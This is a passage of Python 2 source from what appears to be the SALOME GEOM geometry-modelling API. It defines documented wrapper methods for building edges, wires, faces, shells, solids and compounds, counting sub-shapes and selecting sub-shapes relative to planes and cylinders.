Parameters:
theShape It can be closed or unclosed pipe-like shell
or a pipe-like solid.
theBase1, theBase2 Two bases of the supposed pipe. This
should be wires or faces of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing an edge or wire that represent
source pipe's path.
"""
anObj = self.PrimOp.RestorePath(theShape, theBase1, theBase2)
RaiseIfFailed("RestorePath", self.PrimOp)
self._autoPublish(anObj, theName, "path")
return anObj
## Build a middle path of a pipe-like shape.
# The path shape can be a wire or an edge.
# @param theShape It can be closed or unclosed pipe-like shell
# or a pipe-like solid.
# @param listEdges1, listEdges2 Two bases of the supposed pipe. This
# should be lists of edges of theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note It is not assumed that exact or approximate copy of theShape
# can be obtained by applying existing Pipe operation on the
# resulting "Path" wire taking theBase1 as the base - it is not
# always possible; though in some particular cases it might work
# it is not guaranteed. Thus, RestorePath function should not be
# considered as an exact reverse operation of the Pipe.
#
# @return New GEOM.GEOM_Object, containing an edge or wire that represent
# source pipe's "path".
#
# @ref tui_creation_pipe_path "Example"
@ManageTransactions("PrimOp")
def RestorePathEdges (self, theShape, listEdges1, listEdges2, theName=None):
"""
Build a middle path of a pipe-like shape.
The path shape can be a wire or an edge.
Parameters:
theShape It can be closed or unclosed pipe-like shell
or a pipe-like solid.
listEdges1, listEdges2 Two bases of the supposed pipe. This
should be lists of edges of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing an edge or wire that represent
source pipe's path.
"""
anObj = self.PrimOp.RestorePathEdges(theShape, listEdges1, listEdges2)
RaiseIfFailed("RestorePath", self.PrimOp)
self._autoPublish(anObj, theName, "path")
return anObj
# end of l3_complex
## @}
## @addtogroup l3_advanced
## @{
## Create a linear edge with specified ends.
# @param thePnt1 Point for the first end of edge.
# @param thePnt2 Point for the second end of edge.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created edge.
#
# @ref tui_creation_edge "Example"
@ManageTransactions("ShapesOp")
def MakeEdge(self, thePnt1, thePnt2, theName=None):
"""
Create a linear edge with specified ends.
Parameters:
thePnt1 Point for the first end of edge.
thePnt2 Point for the second end of edge.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created edge.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeEdge(thePnt1, thePnt2)
RaiseIfFailed("MakeEdge", self.ShapesOp)
self._autoPublish(anObj, theName, "edge")
return anObj
## Create a new edge, corresponding to the given length on the given curve.
# @param theRefCurve The referenced curve (edge).
# @param theLength Length on the referenced curve. It can be negative.
# @param theStartPoint Any point can be selected for it, the new edge will begin
# at the end of \a theRefCurve, close to the selected point.
# If None, start from the first point of \a theRefCurve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created edge.
#
# @ref tui_creation_edge "Example"
@ManageTransactions("ShapesOp")
def MakeEdgeOnCurveByLength(self, theRefCurve, theLength, theStartPoint = None, theName=None):
"""
Create a new edge, corresponding to the given length on the given curve.
Parameters:
theRefCurve The referenced curve (edge).
theLength Length on the referenced curve. It can be negative.
theStartPoint Any point can be selected for it, the new edge will begin
at the end of theRefCurve, close to the selected point.
If None, start from the first point of theRefCurve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created edge.
"""
# Example: see GEOM_TestAll.py
theLength, Parameters = ParseParameters(theLength)
anObj = self.ShapesOp.MakeEdgeOnCurveByLength(theRefCurve, theLength, theStartPoint)
RaiseIfFailed("MakeEdgeOnCurveByLength", self.ShapesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "edge")
return anObj
## Create an edge from specified wire.
# @param theWire source Wire
# @param theLinearTolerance linear tolerance value (default = 1e-07)
# @param theAngularTolerance angular tolerance value (default = 1e-12)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created edge.
#
# @ref tui_creation_edge "Example"
@ManageTransactions("ShapesOp")
def MakeEdgeWire(self, theWire, theLinearTolerance = 1e-07, theAngularTolerance = 1e-12, theName=None):
"""
Create an edge from specified wire.
Parameters:
theWire source Wire
theLinearTolerance linear tolerance value (default = 1e-07)
theAngularTolerance angular tolerance value (default = 1e-12)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created edge.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeEdgeWire(theWire, theLinearTolerance, theAngularTolerance)
RaiseIfFailed("MakeEdgeWire", self.ShapesOp)
self._autoPublish(anObj, theName, "edge")
return anObj
## Create a wire from the set of edges and wires.
# @param theEdgesAndWires List of edges and/or wires.
# @param theTolerance Maximum distance between vertices, that will be merged.
# Values less than 1e-07 are equivalent to 1e-07 (Precision::Confusion())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created wire.
#
# @ref tui_creation_wire "Example"
@ManageTransactions("ShapesOp")
def MakeWire(self, theEdgesAndWires, theTolerance = 1e-07, theName=None):
"""
Create a wire from the set of edges and wires.
Parameters:
theEdgesAndWires List of edges and/or wires.
theTolerance Maximum distance between vertices, that will be merged.
Values less than 1e-07 are equivalent to 1e-07 (Precision::Confusion()).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created wire.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeWire(theEdgesAndWires, theTolerance)
RaiseIfFailed("MakeWire", self.ShapesOp)
self._autoPublish(anObj, theName, "wire")
return anObj
## Create a face on the given wire.
# @param theWire closed Wire or Edge to build the face on.
# @param isPlanarWanted If TRUE, the algorithm tries to build a planar face.
# If the tolerance of the obtained planar face is less
# than 1e-06, this face will be returned, otherwise the
# algorithm tries to build any suitable face on the given
# wire and prints a warning message.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_creation_face "Example"
@ManageTransactions("ShapesOp")
def MakeFace(self, theWire, isPlanarWanted, theName=None):
"""
Create a face on the given wire.
Parameters:
theWire closed Wire or Edge to build the face on.
isPlanarWanted If TRUE, the algorithm tries to build a planar face.
If the tolerance of the obtained planar face is less
than 1e-06, this face will be returned, otherwise the
algorithm tries to build any suitable face on the given
wire and prints a warning message.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeFace(theWire, isPlanarWanted)
if isPlanarWanted and anObj is not None and self.ShapesOp.GetErrorCode() == "MAKE_FACE_TOLERANCE_TOO_BIG":
print "WARNING: Cannot build a planar face: required tolerance is too big. Non-planar face is built."
else:
RaiseIfFailed("MakeFace", self.ShapesOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Create a face on the given wires set.
# @param theWires List of closed wires or edges to build the face on.
# @param isPlanarWanted If TRUE, the algorithm tries to build a planar face.
# If the tolerance of the obtained planar face is less
# than 1e-06, this face will be returned, otherwise the
# algorithm tries to build any suitable face on the given
# wire and prints a warning message.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_creation_face "Example"
@ManageTransactions("ShapesOp")
def MakeFaceWires(self, theWires, isPlanarWanted, theName=None):
"""
Create a face on the given wires set.
Parameters:
theWires List of closed wires or edges to build the face on.
isPlanarWanted If TRUE, the algorithm tries to build a planar face.
If the tolerance of the obtained planar face is less
than 1e-06, this face will be returned, otherwise the
algorithm tries to build any suitable face on the given
wire and prints a warning message.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeFaceWires(theWires, isPlanarWanted)
if isPlanarWanted and anObj is not None and self.ShapesOp.GetErrorCode() == "MAKE_FACE_TOLERANCE_TOO_BIG":
print "WARNING: Cannot build a planar face: required tolerance is too big. Non-planar face is built."
else:
RaiseIfFailed("MakeFaceWires", self.ShapesOp)
self._autoPublish(anObj, theName, "face")
return anObj
## See MakeFaceWires() method for details.
#
# @ref tui_creation_face "Example 1"
# \n @ref swig_MakeFaces "Example 2"
def MakeFaces(self, theWires, isPlanarWanted, theName=None):
"""
See geompy.MakeFaceWires() method for details.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakeFaceWires()
anObj = self.MakeFaceWires(theWires, isPlanarWanted, theName)
return anObj
## Create a shell from the set of faces and shells.
# @param theFacesAndShells List of faces and/or shells.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created shell.
#
# @ref tui_creation_shell "Example"
@ManageTransactions("ShapesOp")
def MakeShell(self, theFacesAndShells, theName=None):
"""
Create a shell from the set of faces and shells.
Parameters:
theFacesAndShells List of faces and/or shells.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created shell.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeShell(theFacesAndShells)
RaiseIfFailed("MakeShell", self.ShapesOp)
self._autoPublish(anObj, theName, "shell")
return anObj
## Create a solid, bounded by the given shells.
# @param theShells Sequence of bounding shells.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solid.
#
# @ref tui_creation_solid "Example"
@ManageTransactions("ShapesOp")
def MakeSolid(self, theShells, theName=None):
"""
Create a solid, bounded by the given shells.
Parameters:
theShells Sequence of bounding shells.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solid.
"""
# Example: see GEOM_TestAll.py
if len(theShells) == 1:
descr = self._IsGoodForSolid(theShells[0])
#if len(descr) > 0:
# raise RuntimeError, "MakeSolidShells : " + descr
if descr == "WRN_SHAPE_UNCLOSED":
raise RuntimeError, "MakeSolidShells : Unable to create solid from unclosed shape"
anObj = self.ShapesOp.MakeSolidShells(theShells)
RaiseIfFailed("MakeSolidShells", self.ShapesOp)
self._autoPublish(anObj, theName, "solid")
return anObj
## Create a compound of the given shapes.
# @param theShapes List of shapes to put in compound.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created compound.
#
# @ref tui_creation_compound "Example"
@ManageTransactions("ShapesOp")
def MakeCompound(self, theShapes, theName=None):
"""
Create a compound of the given shapes.
Parameters:
theShapes List of shapes to put in compound.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created compound.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeCompound(theShapes)
RaiseIfFailed("MakeCompound", self.ShapesOp)
self._autoPublish(anObj, theName, "compound")
return anObj
# end of l3_advanced
## @}
## @addtogroup l2_measure
## @{
## Gives quantity of faces in the given shape.
# @param theShape Shape to count faces of.
# @return Quantity of faces.
#
# @ref swig_NumberOf "Example"
@ManageTransactions("ShapesOp")
def NumberOfFaces(self, theShape):
"""
Gives quantity of faces in the given shape.
Parameters:
theShape Shape to count faces of.
Returns:
Quantity of faces.
"""
# Example: see GEOM_TestOthers.py
nb_faces = self.ShapesOp.NumberOfFaces(theShape)
RaiseIfFailed("NumberOfFaces", self.ShapesOp)
return nb_faces
## Gives quantity of edges in the given shape.
# @param theShape Shape to count edges of.
# @return Quantity of edges.
#
# @ref swig_NumberOf "Example"
@ManageTransactions("ShapesOp")
def NumberOfEdges(self, theShape):
"""
Gives quantity of edges in the given shape.
Parameters:
theShape Shape to count edges of.
Returns:
Quantity of edges.
"""
# Example: see GEOM_TestOthers.py
nb_edges = self.ShapesOp.NumberOfEdges(theShape)
RaiseIfFailed("NumberOfEdges", self.ShapesOp)
return nb_edges
## Gives quantity of sub-shapes of type theShapeType in the given shape.
# @param theShape Shape to count sub-shapes of.
# @param theShapeType Type of sub-shapes to count (see ShapeType())
# @return Quantity of sub-shapes of given type.
#
# @ref swig_NumberOf "Example"
@ManageTransactions("ShapesOp")
def NumberOfSubShapes(self, theShape, theShapeType):
"""
Gives quantity of sub-shapes of type theShapeType in the given shape.
Parameters:
theShape Shape to count sub-shapes of.
theShapeType Type of sub-shapes to count (see geompy.ShapeType)
Returns:
Quantity of sub-shapes of given type.
"""
# Example: see GEOM_TestOthers.py
nb_ss = self.ShapesOp.NumberOfSubShapes(theShape, theShapeType)
RaiseIfFailed("NumberOfSubShapes", self.ShapesOp)
return nb_ss
## Gives quantity of solids in the given shape.
# @param theShape Shape to count solids in.
# @return Quantity of solids.
#
# @ref swig_NumberOf "Example"
@ManageTransactions("ShapesOp")
def NumberOfSolids(self, theShape):
"""
Gives quantity of solids in the given shape.
Parameters:
theShape Shape to count solids in.
Returns:
Quantity of solids.
"""
# Example: see GEOM_TestOthers.py
nb_solids = self.ShapesOp.NumberOfSubShapes(theShape, self.ShapeType["SOLID"])
RaiseIfFailed("NumberOfSolids", self.ShapesOp)
return nb_solids
# end of l2_measure
## @}
## @addtogroup l3_healing
## @{
## Reverses an orientation the given shape.
# @param theShape Shape to be reversed.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return The reversed copy of theShape.
#
# @ref swig_ChangeOrientation "Example"
@ManageTransactions("ShapesOp")
def ChangeOrientation(self, theShape, theName=None):
"""
Reverses an orientation the given shape.
Parameters:
theShape Shape to be reversed.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
The reversed copy of theShape.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.ChangeOrientation(theShape)
RaiseIfFailed("ChangeOrientation", self.ShapesOp)
self._autoPublish(anObj, theName, "reversed")
return anObj
## See ChangeOrientation() method for details.
#
# @ref swig_OrientationChange "Example"
def OrientationChange(self, theShape, theName=None):
"""
See geompy.ChangeOrientation method for details.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.ChangeOrientation()
anObj = self.ChangeOrientation(theShape, theName)
return anObj
# end of l3_healing
## @}
## @addtogroup l4_obtain
## @{
## Retrieve all free faces from the given shape.
# Free face is a face, which is not shared between two shells of the shape.
# @param theShape Shape to find free faces in.
# @return List of IDs of all free faces, contained in theShape.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("ShapesOp")
def GetFreeFacesIDs(self,theShape):
"""
Retrieve all free faces from the given shape.
Free face is a face, which is not shared between two shells of the shape.
Parameters:
theShape Shape to find free faces in.
Returns:
List of IDs of all free faces, contained in theShape.
"""
# Example: see GEOM_TestOthers.py
anIDs = self.ShapesOp.GetFreeFacesIDs(theShape)
RaiseIfFailed("GetFreeFacesIDs", self.ShapesOp)
return anIDs
## Get all sub-shapes of theShape1 of the given type, shared with theShape2.
# @param theShape1 Shape to find sub-shapes in.
# @param theShape2 Shape to find shared sub-shapes with.
# @param theShapeType Type of sub-shapes to be retrieved.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of sub-shapes of theShape1, shared with theShape2.
#
# @ref swig_GetSharedShapes "Example"
@ManageTransactions("ShapesOp")
def GetSharedShapes(self, theShape1, theShape2, theShapeType, theName=None):
"""
Get all sub-shapes of theShape1 of the given type, shared with theShape2.
Parameters:
theShape1 Shape to find sub-shapes in.
theShape2 Shape to find shared sub-shapes with.
theShapeType Type of sub-shapes to be retrieved.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of sub-shapes of theShape1, shared with theShape2.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetSharedShapes(theShape1, theShape2, theShapeType)
RaiseIfFailed("GetSharedShapes", self.ShapesOp)
self._autoPublish(aList, theName, "shared")
return aList
## Get all sub-shapes, shared by all shapes in the list <VAR>theShapes</VAR>.
# @param theShapes Shapes to find common sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of objects, that are sub-shapes of all given shapes.
#
# @ref swig_GetSharedShapes "Example"
@ManageTransactions("ShapesOp")
def GetSharedShapesMulti(self, theShapes, theShapeType, theName=None):
"""
Get all sub-shapes, shared by all shapes in the list theShapes.
Parameters:
theShapes Shapes to find common sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of GEOM.GEOM_Object, that are sub-shapes of all given shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetSharedShapesMulti(theShapes, theShapeType)
RaiseIfFailed("GetSharedShapesMulti", self.ShapesOp)
self._autoPublish(aList, theName, "shared")
return aList
## Find in <VAR>theShape</VAR> all sub-shapes of type <VAR>theShapeType</VAR>,
# situated relatively the specified plane by the certain way,
# defined through <VAR>theState</VAR> parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAx1 Vector (or line, or linear edge), specifying normal
# direction and location of the plane to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnPlane "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnPlane(self, theShape, theShapeType, theAx1, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relatively the specified plane by the certain way,
defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAx1 Vector (or line, or linear edge), specifying normal
direction and location of the plane to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnPlane(theShape, theShapeType, theAx1, theState)
RaiseIfFailed("GetShapesOnPlane", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnPlane")
return aList
## Find in <VAR>theShape</VAR> all sub-shapes of type <VAR>theShapeType</VAR>,
# situated relatively the specified plane by the certain way,
# defined through <VAR>theState</VAR> parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAx1 Vector (or line, or linear edge), specifying normal
# direction and location of the plane to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnPlaneIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnPlaneIDs(self, theShape, theShapeType, theAx1, theState):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relatively the specified plane by the certain way,
defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAx1 Vector (or line, or linear edge), specifying normal
direction and location of the plane to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnPlaneIDs(theShape, theShapeType, theAx1, theState)
RaiseIfFailed("GetShapesOnPlaneIDs", self.ShapesOp)
return aList
## Find in <VAR>theShape</VAR> all sub-shapes of type <VAR>theShapeType</VAR>,
# situated relatively the specified plane by the certain way,
# defined through <VAR>theState</VAR> parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAx1 Vector (or line, or linear edge), specifying normal
# direction of the plane to find shapes on.
# @param thePnt Point specifying location of the plane to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnPlaneWithLocation "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnPlaneWithLocation(self, theShape, theShapeType, theAx1, thePnt, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relatively the specified plane by the certain way,
defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAx1 Vector (or line, or linear edge), specifying normal
direction and location of the plane to find shapes on.
thePnt Point specifying location of the plane to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnPlaneWithLocation(theShape, theShapeType,
theAx1, thePnt, theState)
RaiseIfFailed("GetShapesOnPlaneWithLocation", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnPlane")
return aList
## Find in <VAR>theShape</VAR> all sub-shapes of type <VAR>theShapeType</VAR>,
# situated relatively the specified plane by the certain way,
# defined through <VAR>theState</VAR> parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAx1 Vector (or line, or linear edge), specifying normal
# direction of the plane to find shapes on.
# @param thePnt Point specifying location of the plane to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnPlaneWithLocationIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnPlaneWithLocationIDs(self, theShape, theShapeType, theAx1, thePnt, theState):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relatively the specified plane by the certain way,
defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAx1 Vector (or line, or linear edge), specifying normal
direction and location of the plane to find shapes on.
thePnt Point specifying location of the plane to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnPlaneWithLocationIDs(theShape, theShapeType,
theAx1, thePnt, theState)
RaiseIfFailed("GetShapesOnPlaneWithLocationIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified cylinder by the certain way, defined through \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAxis Vector (or line, or linear edge), specifying
# axis of the cylinder to find shapes on.
# @param theRadius Radius of the cylinder to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnCylinder "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnCylinder(self, theShape, theShapeType, theAxis, theRadius, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified cylinder by the certain way, defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAxis Vector (or line, or linear edge), specifying
axis of the cylinder to find shapes on.
theRadius Radius of the cylinder to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnCylinder(theShape, theShapeType, theAxis, theRadius, theState)
RaiseIfFailed("GetShapesOnCylinder", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnCylinder")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified cylinder by the certain way, defined through \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAxis Vector (or line, or linear edge), specifying
# axis of the cylinder to find shapes on.
# @param theRadius Radius of the cylinder to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnCylinderIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnCylinderIDs(self, theShape, theShapeType, theAxis, theRadius, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified cylinder by the certain way, defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAxis Vector (or line, or linear edge), specifying
axis of the cylinder to find shapes on.
theRadius Radius of the cylinder to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnCylinderIDs(theShape, theShapeType, theAxis, theRadius, theState)
RaiseIfFailed("GetShapesOnCylinderIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified cylinder by the certain way, defined through \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAxis Vector (or line, or linear edge), specifying
# axis of the cylinder to find shapes on.
# @param thePnt Point specifying location of the bottom of the cylinder.
# @param theRadius Radius of the cylinder to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnCylinderWithLocation "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnCylinderWithLocation(self, theShape, theShapeType, theAxis, thePnt, theRadius, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified cylinder by the certain way, defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAxis Vector (or line, or linear edge), specifying
axis of the cylinder to find shapes on.
theRadius Radius of the cylinder to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnCylinderWithLocation(theShape, theShapeType, theAxis, thePnt, theRadius, theState)
RaiseIfFailed("GetShapesOnCylinderWithLocation", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnCylinder")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified cylinder by the certain way, defined through \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAxis Vector (or line, or linear edge), specifying
# axis of the cylinder to find shapes on.
# @param thePnt Point specifying location of the bottom of the cylinder.
# @param theRadius Radius of the cylinder to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices
#
# @ref swig_GetShapesOnCylinderWithLocationIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnCylinderWithLocationIDs(self, theShape, theShapeType, theAxis, thePnt, theRadius, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified cylinder by the certain way, defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAxis Vector (or line, or linear edge), specifying
axis of the cylinder to find shapes on.
theRadius Radius of the cylinder to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnCylinderWithLocationIDs(theShape, theShapeType, theAxis, thePnt, theRadius, theState)
RaiseIfFailed("GetShapesOnCylinderWithLocationIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified sphere by the certain way, defined through \a theState parameter.
# @param theShape Shape to find sub-shapes of.
